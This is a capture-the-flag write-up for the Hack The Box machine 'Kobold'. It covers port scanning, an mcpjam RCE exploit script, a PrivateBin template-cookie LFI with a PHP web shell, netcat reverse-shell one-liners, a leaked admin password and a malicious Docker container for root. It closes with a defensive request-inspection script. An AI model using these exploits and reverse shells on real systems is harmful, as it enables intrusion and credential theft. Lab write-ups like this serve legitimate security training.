HTB - Kobold

Published: 2026/6/19 16:23:57

Target: 10.129.13.191

nmap scan

sudo nmap --top-ports 10000 10.129.13.191 --min-rate 1000 -oA ips_quick_TCP_nmapscan
sudo nmap --top-ports 10000 10.129.13.191 --min-rate 1000 -sU -oA ips_quick_UDP_nmapscan
nmap -p- 10.129.13.191 -oA ips_full_TCP_nmapscan --min-rate 1000
sudo nmap -p- 10.129.13.191 -sU -oA ips_full_UDP_nmapscan --min-rate 1000

We notice that the page on port 80 says the site is still under development, so we run asset discovery against it and find a username, admin, which we note down. Taking everything together, we decide to scan for vhosts first and then run directory scans.

ffuf -w /home/kali/Desktop/Info/SecLists-master/SecLists-master/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u https://kobold.htb/ -H "Host: FUZZ.kobold.htb" -mc all -fw 4
ffuf -w /home/kali/Desktop/Info/customDic/dirsearch_dicc.txt:FUZZ -u https://kobold.htb/FUZZ -mc all -fw 3
ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u https://kobold.htb/FUZZ -e .php -mc all -fw 3

Middleware - mcpjam - RCE

We find the vhost mcp. MCP is normally the tool-calling protocol used with AI models. We add the host entry and visit it:

echo "10.129.13.191 mcp.kobold.htb" | sudo tee -a /etc/hosts

mcpjam is the keyword; searching for it turns up a related PoC:

https://github.com/H1sok444/CVE-2026-23744-PoC

git clone https://github.com/H1sok444/CVE-2026-23744-PoC
cd CVE-2026-23744-PoC

Modify the script as follows:

# Description : This was written for a CTF but can be used for any authorized vulnerable target
# CVE : CVE-2026-23744
# Author : H1sok444
import time
import requests
import sys

# Change this
attacker_ip = "10.10.15.116"
port = 80

def reproduce(target):
    print("[*] Checking server...")
    # Wait up to 30 seconds for the target to answer
    start_time = time.time()
    while time.time() - start_time < 30:
        try:
            r = requests.get(f"https://{target}", timeout=2, verify=False)
            if r.status_code in [200, 302, 403]:
                break
        except Exception:
            time.sleep(1)
    print("[+] Server reachable")

    exploit_url = f"https://{target}/api/mcp/connect"
    reverse_shell = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.15.116 80 >/tmp/f"
    # The connect endpoint launches serverConfig.command with the supplied args
    payload = {
        "serverConfig": {
            "command": "/bin/sh",
            "args": ["-c", reverse_shell],
            "env": {}
        },
        "serverId": "rce_test"
    }

    print("[*] Sending exploit...")
    try:
        requests.post(exploit_url, json=payload, timeout=5, verify=False)
    except Exception:
        # very normal if shell connects and breaks HTTP
        pass
    print("[+] Payload sent, check your listener!")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} mcp.kobold.htb")
        sys.exit(1)
    reproduce(sys.argv[1])

Run it:

nc -lvnp 80
python3 exploit.py mcp.kobold.htb

Run linpeas:

wget http://10.10.15.116:81/linpeas.sh
chmod 755 linpeas.sh
./linpeas.sh

We notice that port 8080 is a port mapped from a Docker container, and we find a new vhost that corresponds exactly to that container: bin.kobold.htb. Add the vhost:

echo "10.129.13.191 bin.kobold.htb" | sudo tee -a /etc/hosts

Middleware - PrivateBin - local LFI

We note the PrivateBin version number; that version has a local LFI issue:

https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-g2j9-g8r5-rg82

cd /privatebin-data/data
echo '<?php phpinfo();?>' > pwn.php

Then we craft the following request:

GET / HTTP/1.1
Host: bin.kobold.htb
User-Agent: curl/8.15.0
Accept: */*
Cookie: template=../data/pwn
Connection: keep-alive
Referer: http://bin.kobold.htb/

We craft a reverse-connect script:

echo '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 172.17.0.1 9001 >/tmp/f");?>' > pwn4.php

Then we craft the following request:

GET / HTTP/1.1
Host: bin.kobold.htb
User-Agent: curl/8.15.0
Accept: */*
Cookie: template=../data/pwn4
Connection: keep-alive
Referer: http://bin.kobold.htb/

The Docker capabilities do not allow an escape:

capsh --decode=00000000a80425fb

Pivoting to credential theft

We find that a conf file contains a password.

Middleware - Arcane abuse - RCE - Linux privilege escalation

We turn to the 3552 we found earlier:

arcane ComplexPsswordAdmin1928

Next we craft a malicious Docker container and click Create; it succeeds. We then access the corresponding directory.
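As a defender-side complement to the two request shapes used above (the PrivateBin template cookie and the mcpjam /api/mcp/connect body), here is an added example that is not part of the writeup or of either project: it parses raw HTTP requests and flags both patterns, so the same checks can sit in a reverse proxy or a log replay. The hostnames and sample requests are constructed, and the allowlist regex is my assumption about what a template name should look like.

```python
import json
import re

# Allowlist for PrivateBin's "template" cookie: a bare template name, no path characters (assumption).
TEMPLATE_OK = re.compile(r"^[A-Za-z0-9_-]+$")

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def parse_cookies(header: str) -> dict:
    """Minimal Cookie header parser; values are kept verbatim for inspection."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def inspect_request(raw: str) -> list:
    """Return findings for the two request shapes this writeup relies on."""
    method, path, headers, body = parse_request(raw)
    findings = []
    template = parse_cookies(headers.get("cookie", "")).get("template")
    if template is not None and not TEMPLATE_OK.match(template):
        findings.append(f"privatebin: template cookie is not a bare name: {template!r}")
    if method == "POST" and path.split("?")[0] == "/api/mcp/connect":
        try:
            cfg = json.loads(body).get("serverConfig") or {}
        except (ValueError, AttributeError):
            cfg = {}
        if isinstance(cfg, dict) and cfg.get("command"):
            findings.append(f"mcpjam: client-supplied command on /api/mcp/connect: {cfg['command']!r}")
    return findings

# Constructed sample requests (not captured from the box); hostnames are placeholders.
BENIGN = "GET / HTTP/1.1\r\nHost: bin.example.test\r\nCookie: template=bootstrap5\r\n\r\n"
TRAVERSAL = "GET / HTTP/1.1\r\nHost: bin.example.test\r\nCookie: template=../data/pwn\r\n\r\n"
MCP = ("POST /api/mcp/connect HTTP/1.1\r\nHost: mcp.example.test\r\n\r\n"
       + json.dumps({"serverConfig": {"command": "/bin/sh", "args": ["-c", "id"]}, "serverId": "x"}))
```

inspect_request(BENIGN) returns an empty list, while the other two samples each produce one finding naming the offending value.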
